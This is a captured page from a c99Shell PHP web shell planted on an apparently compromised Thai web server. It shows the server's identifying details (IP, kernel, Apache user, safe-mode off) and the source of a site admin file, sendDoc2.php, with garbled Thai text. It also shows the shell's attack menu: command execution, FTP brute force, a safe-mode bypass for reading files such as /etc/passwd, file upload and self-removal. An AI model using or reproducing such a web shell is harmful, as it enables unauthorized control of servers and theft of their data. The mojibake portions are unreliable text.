110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/directorBCNU/admin/ drwxr-xr-x Free 52.33 GB of 127.8 GB (40.94%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/ drwxr-xr-x
Free 52.33 GB of 127.8 GB (40.94%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: sendDoc2.php (21.04 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

SearchMaxDocGroup(); $InputThai=$oSys->SearchByInputThai(); $DLCID="27"; include_once "selectposition.php"; ?>

">Ки§¶Ц§јЩйГСєјФґЄНє

" size="3"> Ки§¶Ц§јЩйГСєјФґЄНє

" size="2"> ГТВЎТГЛ№С§КЧН·ХиВС§дБидґйКи§¶Ц§јЩйГСєјФґЄНє "> SearchByKey($DLCID); $oDlc->GetRecord(); $oDlp1->SearchByKey($oDlc->DlpID); $oDlp1->GetRecord(); if($oDlp1->DlpPID!="0"){ $DlcPS2=$DLCID; }else{ $DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId); } if($GroupID=="110" || $GroupID=="111" || $GroupID=="112" || $GroupID=="115"){ $oDlp->SearchByKey($oDlc->DlpID); $oDlp->GetRecord(); $DlcSeq=$oDlc->DlcSeq-2; $DlcSeq2=$oDlc->DlcSeq-1; $oDlc3->SearchByNextDlcID($DlcSeq,$oDlc->docGroup,$oDlc->deptId); $oDlc3->GetRecord(); $DLCID2=$oDlc3->DlcID; if($oDlp->DlpPID=="0"){ $oDlc4->SearchByNextDlcID($DlcSeq2,$oDlc->docGroup,$oDlc->deptId); $oDlc4->GetRecord(); $DlcPS22=$oDlc4->DlcID; }else{ $DlcPS22=$DLCID2; } $oDoc->SearchByDlcIDDocGroupPSDlcID2DsID3DrsSendDateDrsSEnd($DLCID2,$MaxDocGroup,$DlcPS22); }else{ $oDoc->SearchByDlcIDDocGroupPSDlcID2DsID3DrsSendDateDrsSEndnotY($DLCID,$MaxDocGroup,$DlcPS2); } $i=0; while($oDoc->GetRecord()){ $oStmp->SearchByDrsID($oDoc->DrsID); while($oStmp->GetRecord()){ $oStmp->Delete(); } if(($i%2) == 0) echo ""; else echo ""; ?> DslID=="0"){ $rapid="../picture/rapid0.jpg"; $rapidname=$oDsl2->SearchName(0); }else if($oDoc->DslID=="1"){ $rapid="../picture/rapid1.jpg"; $rapidname=$oDsl2->SearchName(1); }else if($oDoc->DslID=="2"){ $rapid="../picture/rapid2.jpg"; $rapidname=$oDsl2->SearchName(2); }else if($oDoc->DslID=="3"){ $rapid="../picture/rapid3.jpg"; $rapidname=$oDsl2->SearchName(3); }else{ $rapid="../picture/blank.gif"; $rapidname=""; }?> DclID=="0"){ $secret="../picture/secret0.jpg"; $secretname=$oDcl2->SearchName(0); }else if($oDoc->DclID=="1"){ $secret="../picture/secret1.jpg"; $secretname=$oDcl2->SearchName(1); }else if($oDoc->DclID=="2"){ $secret="../picture/secret2.jpg"; $secretname=$oDcl2->SearchName(2);}else if($oDoc->DclID=="3"){ $secret="../picture/secret3.jpg"; $secretname=$oDcl2->SearchName(3); }else if($oDoc->DclID=="4"){ $secret="../picture/secret4.jpg"; $secretname=$oDcl2->SearchName(4); }else{ $secret="../picture/blank.gif"; $secretname="";}?>

" size="2">·Хи/©єСє·Хи/¤ГСй§·Хи/аЕў·Хи	" size="2">ЁТЎ/·ХиБТ (µй№аГЧиН§)	" size="2">аГЧиН§/ЗиТґйЗВ (Є№ФґЛ№С§КЧН)
DocNo; ?>	DtID=="1" \|\| $oDoc->DtID=="2" \|\| $oDoc->DtID=="14"){ echo " ".$oDoc->DocFrom." "; }else{ if($oDoc->DocPID=="0"){ $oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP->SearchByKey($oDlc2->deptId); $oDP->GetRecord(); echo " ".$oDP->deptName." "; echo " (".$oDlp->DlpName.")"; }else{ $oRs6->SearchByDocIDDocGroupStatus($oDoc->DocID,$oDoc->DocGroup,0); $oRs6->GetRecord(); $oRs7->SearchByKey($oRs6->DrsFromDrsID); $oRs7->GetRecord(); $oDoc2->SearchByKey($oRs7->DocID); $oDoc2->GetRecord(); $oDlc2->SearchByKey($oDoc2->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP->SearchByKey($oDlc2->deptId); $oDP->GetRecord(); echo " ".$oDP->deptName." "; echo " (".$oDlp->DlpName.")"; } } ?>	DocSubject; ?>".$oDoc->CertificatePs; }else{ echo $oDoc->DocSubject; } ?> " size="2">SearchByKey($oDoc->DtID); $oDt->GetRecord(); echo "(".$oDt->DtName.")";?> DlpPID!="0"){ if($DLCID==$oDoc->DlcID){ echo " [ГСЎЙТЎТГ]"; }} ?> DlpPID=="0"){ if($DlcPS2==$oDoc->DlcID){ echo " [ГСЎЙТЎТГ]"; }} ?>

" size="2"> дБиБХГТВЎТГЛ№С§КЧН·ХиКи§¶Ц§јЩйГСєјФґЄНє

" size="2"> style="display:none; cursor:pointer" style="display:''; cursor:pointer" onclick="up_downList('')"> бКґ§ГТВЎТГЛ№С§КЧН·ХиКи§¶Ц§јЩйГСєјФґЄНєбЕйЗ·Сй§ЛБґ style="display:''; cursor:pointer" style="display:none; cursor:pointer" alt="«иН№" onclick="up_downList('')"> «иН№ГТВЎТГЛ№С§КЧН·ХиКи§¶Ц§јЩйГСєјФґЄНєбЕйЗ·Сй§ЛБґ style="display:''; border-collapse:collapse" style="display:none; border-collapse:collapse" >

" size="2"> ¤й№ЛТЛ№С§КЧН (аГЧиН§/ЗиТґйЗВ) »ГРЁУаґЧН№ onKeyUp="On_Year()" onKeyPress="event.keyCode=CheckInput(event.keyCode,''); return event.keyCode;">

style="display:''; border-collapse:collapse" style="display:none; border-collapse:collapse" background=""> SearchByDlcIDDocGroupDsID31DlcPS2DrsSendDate($DLCID,$MaxDocGroup,$DlcPS2,$monthe,th2a($searchYear),th2a($searchName)); while($oRs4->GetRecord()){ $numrow++; } $numRow = $numrow; //echo "===========".$numRow; $page_size = 10; $total_page = (int)($numRow/$page_size); if(($numRow%$page_size) != 0) $total_page++; if(isset($page_id)) $start = $page_size*($page_id-1); else { $page_id = 1; $start = 0; } //echo "numrow=".$numrow; //------------------------------- $numrow=0; //echo "DLCID=".$DLCID."
"; //echo "DlcPS2=".$DlcPS2."
"; $oRs5->SearchByDlcIDDocGroupDsID31DlcPS2LimitDrsSendDate($DLCID,$MaxDocGroup,$DlcPS2, $start, $page_size,$monthe,th2a($searchYear),th2a($searchName)); $z=0; while($oRs5->GetRecord()){ $oDoc3->SearchByKey($oRs5->DocID); $oDoc3->GetRecord(); if(($z%2) == 0) echo ""; else echo ""; ?>

" size="2">·Хи/©єСє·Хи/¤ГСй§·Хи/аЕў·Хи	" size="2">ЁТЎ/·ХиБТ (µй№аГЧиН§)	" size="2">аГЧиН§/ЗиТґйЗВ (Є№ФґЛ№С§КЧН)	" size="2">ЗС№·ХиКи§¶Ц§јЩйГСєјФґЄНє
DocNo; ?>	DtID=="1" \|\| $oDoc3->DtID=="2" \|\| $oDoc3->DtID=="14"){ echo " ".$oDoc3->DocFrom." "; }else{ if($oDoc3->DocPID=="0"){ $oDlc2->SearchByKey($oDoc3->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP->SearchByKey($oDlc2->deptId); $oDP->GetRecord(); echo " ".$oDP->deptName." "; echo " (".$oDlp->DlpName.")"; }else{ $oRs6->SearchByDocIDDocGroupStatus($oRs5->DocID,$oRs5->DocGroup,0); $oRs6->GetRecord(); $oRs7->SearchByKey($oRs6->DrsFromDrsID); $oRs7->GetRecord(); $oDoc2->SearchByKey($oRs7->DocID); $oDoc2->GetRecord(); $oDlc2->SearchByKey($oDoc2->DlcID); $oDlc2->GetRecord(); $oDlp->SearchByKey($oDlc2->DlpID); $oDlp->GetRecord(); $oDP->SearchByKey($oDlc2->deptId); $oDP->GetRecord(); echo " ".$oDP->deptName." "; echo " (".$oDlp->DlpName.")"; } } ?>	DocSubject; ?> " size="2"> SearchByKey($oDoc3->DtID); $oDt->GetRecord(); echo "(".$oDt->DtName.")"; ?> DlpPID!="0"){ if($DLCID==$oRs5->DlcID){ echo " [ГСЎЙТЎТГ]"; }} ?> DlpPID=="0"){ if($DlcPS2==$oRs5->DlcID){ echo " [ГСЎЙТЎТГ]"; }} ?>	DrsSendDate!="0000-00-00 00:00:00"){ list($DocD,$DocT) = split(' ',$oRs5->DrsSendDate); echo abbreDate2($DocD,'/')." ".a2th($DocT); } ?>
" size="2"> дБиБХГТВЎТГЛ№С§КЧН·ХиКи§¶Ц§јЩйГСєјФґЄНєбЕйЗ
Л№йТ-> ";}?>

" size="2"> ЛБТВаЛµШ :	" size="2">¤ЕФЎ·ХиаГЧиН§Л№С§КЧНаѕЧиНКи§¶Ц§јЩйГСєјФґЄНє
	" size="2">¤ЕФЎ·ХиаГЧиН§Л№С§КЧН·ХиКи§¶Ц§јЩйГСєјФґЄНєбЕйЗ аѕЧиНКи§Л№С§КЧН¶Ц§јЩйГСєјФґЄНєаѕФиБаµФБ
	" size="2">ЄСй№¤ЗТБаГзЗ RSDocSpeedLevel(); $r=0; while($oDsl->GetRecord()){ if($oDsl->DslID=="0"){ $picsp="../picture/rapid0.jpg"; }else if($oDsl->DslID=="1"){ $picsp="../picture/rapid1.jpg"; }else if($oDsl->DslID=="2"){ $picsp="../picture/rapid2.jpg"; }else if($oDsl->DslID=="3"){ $picsp="../picture/rapid3.jpg"; } else if($oDsl->DslID=="4"){ $picsp="../picture/rapid4.jpg"; } ?> DslName." "; $r++; }?>
	" size="2">ЄСй№¤ЗТБЕСє RSDocSecretLevel(); $r=0; while($oDcl->GetRecord()){ if($oDcl->DclID=="0"){ $piccl="../picture/secret0.jpg"; }else if($oDcl->DclID=="1"){ $piccl="../picture/secret1.jpg"; }else if($oDcl->DclID=="2"){ $piccl="../picture/secret2.jpg"; }else if($oDcl->DclID=="3"){ $piccl="../picture/secret3.jpg"; } else if($oDcl->DclID=="4"){ $piccl="../picture/secret4.jpg"; } ?> DclName." "; $r++; }?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--